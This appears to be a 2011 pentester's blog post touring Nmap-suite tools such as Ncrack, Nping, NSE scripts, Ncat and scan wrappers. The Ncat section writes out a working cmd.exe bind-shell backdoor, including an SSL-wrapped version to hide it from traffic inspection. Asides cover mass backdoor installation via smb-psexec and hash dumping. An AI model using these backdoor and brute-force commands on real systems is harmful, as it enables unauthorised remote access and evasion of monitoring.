ncrack scanme.nmap.org/24 -p 22Ncrack supports the following protocols:
NpingIn general Hping’s utility is to generate custom packets. Using hping is way easier than implementing custom packets in a scripting language like python. A major drawback to Hping was its lack of inherent “scanner” type functionality, meaning that unless you created a bash wrapper or TCL script it was a one target type of tool. Nping fixes this in stellar fashion by supporting Nmap syntax. Although Nmap has done it’s best to implement the type of scanning one would do with Hping/Nping nothing beats having a command line tool to send custom packets. Custom packets being a very ambiguous term, Hping has traditionally been used to test firewalls, evade IDS, send POC/DoS packets, etc. Many have moved over to Scapy as it offers a bit more in the way of customization but Nping is a welcome addition to packet crafting tools.
NSE (Nmap Scripting Engine)The Nmap Scripting Engine is a lua framework to do pretty much anything within nmap, with the power of nmap. If you think about it, it was a natural progression. Some bigtime firms I know have taken vuln scanners out of the rotation in their pentests opting for specific targeted NSE scripts. In addition NSE offers a lot to both netpen and webpen. A plethora of scripts are webpen based. There are a modest 194 scripts in SVN but I know that not everyone is releasing thier scripts, which imo hurts the projects awesomeness. Lame pentesters are lame. Here are some of our favs:
- banner - A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds. We’ve used this to scan large domains with services not in the nmap fingerprints database and pipe the output to files for later inspection.
- dns-cache-snoop - Performs DNS cache snooping against a DNS server. Replaces easy bash scripting, but nice.
- hostmap - Tries to find hostnames that resolve to the target’s IP address by querying the online database at http://www.bfk.de/bfk_dnslogger.html. Replaces Hostmap which is intermittently broken =(
- http-brute - Performs brute force password auditing against http basic authentication. Saves some time setting up Burp to do this.
- http-enum – Enumerates directories used by popular web applications and servers. WIN. We have ported many fingerprints we see often into http-enum’s fingerprint database (in fact we are credited in that source). Dirbuster and wfuzz are great and focus on large sets of common words for directory bruteforcing, we use http-enum for more targeted framework bruteforcing… and it works.
- smb-enum-shares - Attempts to list shares using the
srvsvc.NetShareEnumAllMSRPC function and retrieve more information about them using
srvsvc.NetShareGetInfo. If access to those functions is denied, a list of common share names are checked.
- smb-brute - Attempts to guess username/password combinations over SMB, storing discovered combinations for use in other scripts. SMB is the weakest link… goodbye.
- smb-check-vulns - Checks for vulnerabilities: MS08-067, etc, etc.
- smb-psexec - This script implements remote process execution similar to the Sysinternals’ psexec tool, allowing a user to run a series of programs on a remote machine and read the output. This is great for gathering information about servers, running the same tool on a range of system, or even installing a backdoor on a collection of computers.
- As well as the more targeted SNMP, MSSQL, MYSQL, ORACLE, and Lotus enumeration and bruteforce scripts.
nmap -PN -sS -sV --script=vulscan -p25 www.target.com PORT STATE SERVICE REASON VERSION 25/tcp open smtp syn-ack Exim smtpd 4.69 | vulscan:  Exim Configuration File Variable Overflow |  Exim sender_verify Function Remote Overflow |  Exim header_syntax Function Remote Overflow |  Exim Parenthesis File Name Filter Bypass |  Exim -be Command Line Option host_aton Function Local Overflow |  Exim SPA Authentication spa_base64_to_bits Function Remote Overflow |  Exim -bh Command Line Option dns_build_reverse Function Local OverflowAlso Nmap NSE and Metasploit have bridged a bit through new functions implemented in Metasploit, check that out. Ron also has an experimental pwdump like Nmap script that will dump password hashes and send them to you rainbow tables … effing eh…
So, NSE… get on it. Here are some links to get you hyped:
- Nmaps official video channel w/ scripting talk from Blackhat
- David Shaw’s Nmap Scripting Primer Video
- Ron Bowes Nmap Scripting Presentation from Bsides Ottowa
- Nmap NSE Hacking for IT Security Professionals Presenation by Marc who made vulscan (above)
Ncat is Nmap's answer to Netcat. It pretty much does everything netcat can do plus implements IPV6, UDP, and SSL socket connections... no more stunnel! It also has hex output options, SOCKS4 + HTTP Proxying, and built in access control. Irongeek has a video basically showing all the flag actions in practice, you can find that here. Ncat also comes with a nifty exec feature, here we are ssl wrapping our backdoor: Backdoor ncat:C:\Windows\System32> ncat -l --exec "cmd.exe" 1337Connecting:root@bt:~# ncat 192.168.1.2 1337 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c:\Windows\System32>dir dir Volume in drive C has no label. Volume Serial Number is 00E1-F423 Directory of c:\Windows\System32 04/15/2011 03:20 AM . 04/15/2011 03:20 AM .. 07/13/2009 10:37 PM 0409 09/27/2010 10:33 AM 1033Traffic Inspection of backdoor before SSL: SSL backdoor:C:\Windows\System32> ncat -l --ssl --exec "cmd.exe" 1337Connecting:root@bt:~# ncat --ssl 192.168.1.2 1337Traffic Inspection of "dir" command using backdoor after SSL:
Nmap UDP Payload ScanningThe issue facing accurate scanning of UDP ports is the nature of UDP programs themselves. Delivering anything other than a legitimate UDP Payload to a service usually results in a dropped packet. This is bad news for pentesters, as we want a full and accurate scan of our targets. UDP Payload scanning is the solution (most of the time). Instead of scanning with an empty UDP packet, we send it a legitimate payload that works with the service we are scanning. If we receive a response it indicates an open port. Before Nmap 5.21, Nmap did not support UDP payload scanning. Pentesters previously counted on free tools like UnicornScan, whose author Jack C. Louis passed away last year (rest in peace Jack), or udp-proto-scanner by Portcullis Labs. Although these tools are often stellar, sometimes they are buggy and lack the Nmap type features we want in a port scanner.
Newer versions of Nmap fix that dilemma by adding the following UDP fingerprints for scanning:
udp/7 echo udp/53 domain udp/111 rpcbind udp/123 ntp udp/137 netbios-ns udp/161 SNMP udp/177 xdmcp udp/500 ISAKMP udp/520 route udp/1645 RADIUS udp/1812 RADIUS udp/2049 NFS udp/5353 zeroconf udp/10080 amanda
Auxiliary Nmap ScriptsThere are several scripts for manipulating output and extending Nmap.
- fastNmap and npwn – Perl scripts for maximizing scanning large networks by cutting up your scans into small tasks and analyzing large scan data in better fashion. I’m excited to use this on a cloud provider soon for some fast and furious /16 script scanning. Research project presentations (pdf’s) here and here fastnmap and npwn code here. Smap – Recently an interesting one I have played with is smap a nmap wrapper that will take namp output and run hosts through Niagos service checks as well. The author claims the checks are more accurate than Nmap. Either way, I tested the wrapper against some local lab machines and it identified more HTTP servers and and versions for non-standard ports than map did, and more accurately. Smap discussion here and download here.
root@bt:~/smap/scan_data/2011-04-26_16.15.29# cat report-hosts.log Scan_results generated for 2011-04-26_16.15.29 --[ HOST - List ]-------- --------------------------::--------::----------------------->----------------------------------------------------------- IP :: Port :: Service -> Server_Type --------------------------::--------::----------------------->----------------------------------------------------------- 192.168.1.2 :: 10243 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP). Ignored State: closed (12325) 192.168.1.2 :: 8834 :: http -> NessusWWW 192.168.1.2 :: 5357 :: http -> Microsoft HTTPAPI httpd 2.0 (SSDP.UPnP). 192.168.1.2 :: 3389 :: microsoft-rdp -> Microsoft Terminal Service. 192.168.1.2 :: 3306 :: mysql -> MySQL (unauthorized). 192.168.1.2 :: 2869 :: icslap? -> . 192.168.1.2 :: 1241 :: ssl.nessus -> Nessus Daemon (NTP v1.2). 192.168.1.2 :: 1036 :: nsstp? -> . 192.168.1.2 :: 1035 :: multidropper? -> . 192.168.1.2 :: 1027 :: msrpc -> Microsoft Windows RPC. 192.168.1.2 :: 1026 :: LSA-or-nterm? -> . 192.168.1.2 :: 1025 :: msrpc -> Microsoft Windows RPC. 192.168.1.2 :: 990 :: ftps? -> . 192.168.1.2 :: 912 :: vmware-auth -> VMware Authentication Daemon 1.0 (Uses VNC 192.168.1.2 :: 554 :: rtsp? -> . 192.168.1.2 :: 445 :: netbios-ssn -> . 192.168.1.2 :: 443 :: ssl.http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl. v5.10.1). 192.168.1.2 :: 139 :: netbios-ssn -> . 192.168.1.2 :: 135 :: msrpc -> Microsoft Windows RPC. 192.168.1.2 :: 80 :: http -> Apache httpd 2.2.17 ((Win32) mod_ssl.2.2.17 OpenSSL.0.9.8o PHP.5.3.4 mod_perl.2.0.4 Perl. v5.10.1).Rainmap – Rainmap was a Summer of Code project to distribute nmap scanning among cloud servers and consolidate command and control through a single web gui. The project was completed but is slated for a rewrite this SoC. For me, it looks like it has too many moving parts and needs some more development but it is out there. Nmap to SQL – Nmap lacks sql output for some reason. A buddy of min asked fyodor why its not there by default and fyodor told him to go read the Nmap book. he instead wrote his own, with more output than most of the comparative ones out there. Here. Nsploit – a XMLRPC bridge from nmap to metasploit (yes we know armitage is cool, we prefer non GUI apps). Learn more here Here.
Droidmap – nmap for droid, still in dev. Here.